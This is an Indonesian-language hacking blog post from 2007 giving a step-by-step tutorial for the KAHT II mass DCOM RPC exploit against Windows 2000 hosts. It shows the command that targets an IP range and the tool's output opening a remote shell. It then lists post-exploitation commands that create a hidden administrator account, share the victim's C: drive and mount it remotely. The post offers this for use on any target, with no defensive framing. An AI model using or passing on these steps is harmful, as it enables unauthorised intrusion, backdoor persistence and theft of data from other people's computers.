Wednesday, November 14, 2007
at
10:20 PM
|
Mungkin udah banyak yang buat artikel ini, tapi masih ada yg sering nanyain di milis. Boleh di bilang saya menggabungkan beberapa refensi dan menambah sedikit jamu.
Yang dimaksud DCOM exploit disini adalah kaht,Langkah pertama yaitu download program kaht ii terlebih dahulu (search pakek google) letakkan di directory sesuai dengan keinginan anda, biasanya bentuk file dalam Zip coba extract file tersebut setelah ter exstrack kaht bisa digunakan.
Selanjutnya tentukan alamat ip target misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir
karena disinia kita akan mengexploitasi ip 192.168.0.12 kita gunakan
kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range
terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.
Jika komputer target berhasil di exploitasi maka akan muncul akan
muncul tampilan kurang lebih sebagai berikut :
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by http://us.f406.mail.yahoo.com/ym/Compose?To=At4r@wdesign.es&YY=91376&order=down&sort=date&pos=0
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION :) AUTOHACKING
-------------------------------------------------------------------------
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.
c:\WINNT\system32>
Sampai disini kita sudah berhasil masuk ke komputer target dan kita
berada di directory kerja c:\WINNT\system32>
Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.
Untuk melakukan penambahan user di pc Target
C:WINNTsystem32>net user paluared suck /add
^ ^
nama_user password_user
net user paluared suck /add
The command completed successfully.
ket : disini kita menggunakan perintah net user nama_user password_user
/add berdasarkan perintah diatas kita menambahkan user paluared dengan
password suck, setelah user berhasil dibuat selanjutnya kita memberikan
autority pada user paluared dalam groups administrator
C:\WINNT\system32>net localgroup Administrators paluared /add
^ ^
nama_group nama_user
net localgroup Administrators paluared /add
The command completed successfully.
ket : di atas kita menggunakan perinta net localgroup Nama_gorups
nama_user /add berdasarkan perintah diatas net localgroup berarti kita
menambahkan user paluared kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk paluared adalah nama user yg ditambahkan dalam gruop administrator.
setelah masuk coba lo buat user gruops administrator
C:WINNTsystem32>net user paluared such /add
^ ^
user password
setelah itu masukan user paluared ke gruops administrator
C:WINNTsystem32>net localgroup Administrators paluared /add
setelah itu sharing drive-nya
C:WINNTsystem32>net share c=c:
catatan user id nya terserah lo kasih apa sesuai keinginana lo..
oh ya
untuk menggunakan sharing drive tersebut bisa gunakan perintah net use pertama buka dos promt baru di komputer kita
selanjutnya ketik berikut:
c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C: <--- masukan password disini ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/paluared bahwa kita masuk dengan menggunakan user paluared (biasanya di dalam winxp/win2000 terdapat sharing defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa malukan net share berdasarkan default sharing ini ) cat IP-Addres bisa juga di isi dengan nama computer untuk keterangan nya lo bisa baca manualnya net use /? setelah berhasil bisa liat di windows explorer C:\WINNT\system32>net share drive_c=c: ^ ^
nama_sharing drive_sharing
net share Drive_c=c:c was shared successfully.
ket : berdasarkan perintah diatas kita melakukan telah sharing drive
yaitu drive C dengan memberikan nama drive_C
Reference:
- http://202.133.83.74/tutorialhacker.php
- http://home.earthlink.net/~rlively/MANUALS/COMMANDS/N/NETGROUP.HTM
- http://tutorial.blogthing.com/2004/12/02/hacking-password-windows/
thanks GOD
Posted by
admin
Labels:
Hacker
0 comments:
Post a Comment